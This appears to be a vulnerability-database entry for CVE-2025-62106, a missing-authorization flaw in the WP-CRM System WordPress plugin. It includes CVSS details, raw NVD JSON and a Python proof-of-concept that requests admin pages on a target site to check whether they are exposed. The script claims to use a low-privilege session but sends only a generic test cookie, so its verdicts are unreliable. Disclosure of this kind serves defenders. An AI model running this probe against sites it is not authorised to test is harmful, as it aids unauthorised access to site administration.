Security Vulnerability Report
中文
CVE-2025-62106 CVSS 5.4 MEDIUM

CVE-2025-62106

Published: 2026-01-22 17:15:59
Last Modified: 2026-04-27 18:16:26

Description

Missing Authorization vulnerability in Mario Peshev WP-CRM System wp-crm-system allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects WP-CRM System: from n/a through <= 3.4.5.

CVSS Details

CVSS Score
5.4
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N

Configurations (Affected Products)

No configuration data available.

WP-CRM System <= 3.4.5

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests import sys # CVE-2025-62106 PoC - WP-CRM System Broken Access Control # Target: WordPress site with WP-CRM System plugin <= 3.4.5 def check_vulnerability(target_url, wp_path='/wp-admin'): """ Check if target is vulnerable to CVE-2025-62106 """ # Get WordPress nonce for AJAX requests admin_ajax_url = f"{target_url}{wp_path}/admin-ajax.php" # Test unauthorized access to CRM admin functions # These endpoints should require admin privileges vulnerable_endpoints = [ '/wp-admin/admin.php?page=wp-crm-system', '/wp-admin/admin.php?page=wp-crm-system&action=add_contact', '/wp-admin/admin.php?page=wp-crm-system&action=view_all_contacts', ] headers = { 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64)', 'Cookie': 'wordpress_test_cookie=WP+Cookie+check' # Low-priv cookie } print(f"[*] Testing {target_url} for CVE-2025-62106") print(f"[*] Using low-privilege user session...\n") for endpoint in vulnerable_endpoints: full_url = f"{target_url}{endpoint}" try: response = requests.get(full_url, headers=headers, timeout=10, allow_redirects=False) # Check if we can access admin-only pages without proper auth if response.status_code == 200 and 'wp-crm-system' in response.text: print(f"[+] VULNERABLE: {full_url}") print(f" Low-privilege user can access admin functionality!") elif response.status_code == 302: print(f"[-] Redirected (may require auth): {full_url}") else: print(f"[-] Protected: {full_url} (Status: {response.status_code})") except requests.RequestException as e: print(f"[!] Error testing {full_url}: {e}") print("\n[*] Note: This PoC demonstrates potential access control issues.") print("[*] Manual verification recommended for full exploitation.") if __name__ == '__main__': if len(sys.argv) > 1: target = sys.argv[1] check_vulnerability(target) else: print(f"Usage: python {sys.argv[0]} http://target.com")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-62106", "sourceIdentifier": "[email protected]", "published": "2026-01-22T17:15:59.020", "lastModified": "2026-04-27T18:16:25.897", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Missing Authorization vulnerability in Mario Peshev WP-CRM System wp-crm-system allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects WP-CRM System: from n/a through <= 3.4.5."}, {"lang": "es", "value": "Vulnerabilidad de autorización faltante en Mario Peshev WP-CRM System wp-crm-system permite explotar niveles de seguridad de control de acceso configurados incorrectamente. Este problema afecta a WP-CRM System: desde n/a hasta &lt;= 3.4.5."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.5}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/wp-crm-system/vulnerability/wordpress-wp-crm-system-plugin-3-4-5-broken-access-control-vulnerability-2?_s_id=cve", "source": "[email protected]"}]}}